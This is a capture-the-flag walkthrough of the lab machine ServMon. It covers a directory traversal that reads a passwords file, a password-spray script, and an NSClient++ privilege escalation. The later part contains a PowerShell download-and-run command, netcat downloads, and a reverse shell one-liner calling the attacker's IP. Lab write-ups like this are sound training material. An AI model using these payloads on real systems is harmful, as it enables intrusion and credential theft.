Name: | ServMon |
---|---|
Release Date: | 11 Apr 2020 |
Retire Date: | 20 Jun 2020 |
OS: | Windows |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
sampriti 00 days, 03 hours, 08 mins, 02 seconds | |
sampriti 00 days, 03 hours, 34 mins, 10 seconds | |
Creator: | dmw0ng |
CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 10:02 EDT
Nmap scan report for 10.10.10.184
Host is up (0.025s latency).
Not shown: 65517 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
|
|
|
|
|
|
|
|
|
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at
https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=7/16%Time=5F105E2D%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbfx20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n\r\n\r\n\x20\x20\x20\x20 \r\n\x20\
SF:x20\x20\x20\r\n\r\n\r\n\r\n
We've got everything open on this one. FTP, SSH, HTTP, RPC, HTTPS on 8443 and a bunch more. Let's start with FTP. It looks like Anonymous login is allowed. So, let's see what goodies are accessible. It looks like there are 2 folders in Users (Nadine and Nathan) with 1 TXT file each. Get them.
The one on Nadine's folder says:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
And Nathan's says:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
That appears to be everything we can get from FTP. Let's take a look at the HTTP site, which is the NVMS-1000 CCTV/NVR style surveillance system. Don't bother with trying Default Credentials. I already tried and failed. I can't seem to get anything working on HTTP. Let's jump to HTTPS and see if we have better luck. That appears to be NSCLient++ (whatever that is). Let's searchsploit NVMS and see if something jumps out.
OK. We have some directory traversal possibilities here. The 47774.txt (also found here) basically says intercept the main page HTTP GET request and change the target. Time to fire up BurpSuite. Intercept and send it to Repeater, change the GET string to "/../../../../../../../../../../../../windows/win.ini HTTP/1.1" and fire away.
Vulnerability Confirmed. The Confidential.txt file on Nadine's FTP folder says she put the passwords on Nathan's Desktop. So, let's try "GET"ting them. We change the GET string again, this time to:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
And we get the list of passwords on Nathan's Desktop.
The list is:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
And we should be able to perform a password spray attack on.....well, everything. To start, create a users.txt file with administrator, Nathan, and Nadine in it. Create a passwords.txt file with the list above in it. It's a little funky, but here's the quick and dirty bash script for it.
#!/bin/bash
for u in $(cat users.txt); do
echo -n "[*] user: $u" &&
for p in $(cat passwords.txt); do
echo "$u % $p"
rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184
done
done
RESULT:
$ ./spray.sh
[*] user: administratoradministrator % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % L1k3B1gBut7s@W0rk
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
[*] user: NathanNathan % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % L1k3B1gBut7s@W0rk
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
[*] user: NadineNadine % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % L1k3B1gBut7s@W0rk
Account Name: Nadine, Authority Name: SERVMON
Nadine % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Notice when it got to Nadine % L1k3B1gBut7s@W0rk that it replied Account Name: Nadine, Authority Name: SERVMON. That's a successful connection. We just got Nadine's credentials. SSH with that and we've got ourselves a foothold. Now, you can use the ssh_login module in Metasploit located auxiliary/scanner/ssh/ssh_login, but again MSF makes us lazy! Moving on. Looking around on the box (and since we already know NVMS and NSClient++ are on this machine) I find the NSClient.ini file that, surprise, has another password of "ew2x6SsGTxjRwXOT". Unfortunately, it also shows that we can only access it from the localhost, which is not very helpful right now. Let's keep looking.
What version of NSClient is running?
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
OH! Now we're getting somewhere! There is a Privilege Escalation path with NSClient++ version 0.5.2.35 located here. Obviously, we don't want to reboot the system like the exploit states, but we will need to restart the service. Let's see if we can do that. Performing a little bit of Google Fu, we can find https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ that has a nice PowerShell script that will do it for us. We just need to get it to the target. We do that using Msxml2.XMLHTTP COM.
$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText
and then running it with
Get-Service nscp | fl *
And with CanStop being set to True, that means we CAN restart the service. We need to see that 8443 page, but only localhost can.....let's try an ssh tunnel.
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
Then we should be able to log in with the password found in the INI file on the https://localhost:8443 page.
Now we just follow the directions from the ExploitDB page. I change to the Temp directory and get Netcat over to the box.
Next, create the bat:
C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe
and move it to the target the same way.
PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")
After verifying that Netcat and our malicious bat file are in place, Restart the NSCP service.
Now, go to the Client webpage, Navigate to Settings > External Scripts > Scripts and hit Add New
In Section, give it a name (I used shell), in Key put command, and in Value set the path to our Batch file.
Once you add it, the Changes button at the top will change to red. Select it and hit Save Configuration.
Now that you have it added, restart the NSCP service with:
sc.exe stop ncsp
sc.exe start ncsp
Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient Page and go to Console. Under the logs is an input box. Type in the name of the script you added (in my case shell) and hit Run. Check your Netcat listener. Administrator Shell.